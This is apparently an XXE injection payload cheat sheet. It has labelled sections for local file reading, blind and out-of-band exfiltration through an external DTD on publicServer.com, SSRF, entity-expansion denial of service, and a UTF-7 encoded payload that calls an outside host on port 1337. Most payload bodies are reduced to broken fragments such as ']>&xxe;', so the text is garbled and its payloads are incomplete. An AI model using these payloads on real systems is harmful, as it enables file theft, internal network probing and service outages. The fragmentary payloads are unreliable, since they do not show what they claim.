**LFI Test**
```
]>&xxe;
```
**Blind LFI test (when first case doesn't return anything)**
```
]>&blind;
```
**Access Control bypass (loading restricted resources - PHP example)**
```
]>
∾
```
**SSRF Test**
```
]>&xxe;
```
**XEE (XML Entity Expansion - DOS)**
```
]>
&lol9;
```
**XEE #2 (Remote attack - through external xml inclusion)**
```
]>
3..2..1...&test
```
**XXE FTP HTTP Server**
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
```
%remote;
%send;
]>
4
File stored on http://publicServer.com/parameterEntity_sendftp.dtd
">
%param1;
```
**XXE UTF-7**
```
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
To convert between UTF-8 & UTF-7 use recode.
`recode UTF8..UTF7 payload-file.xml`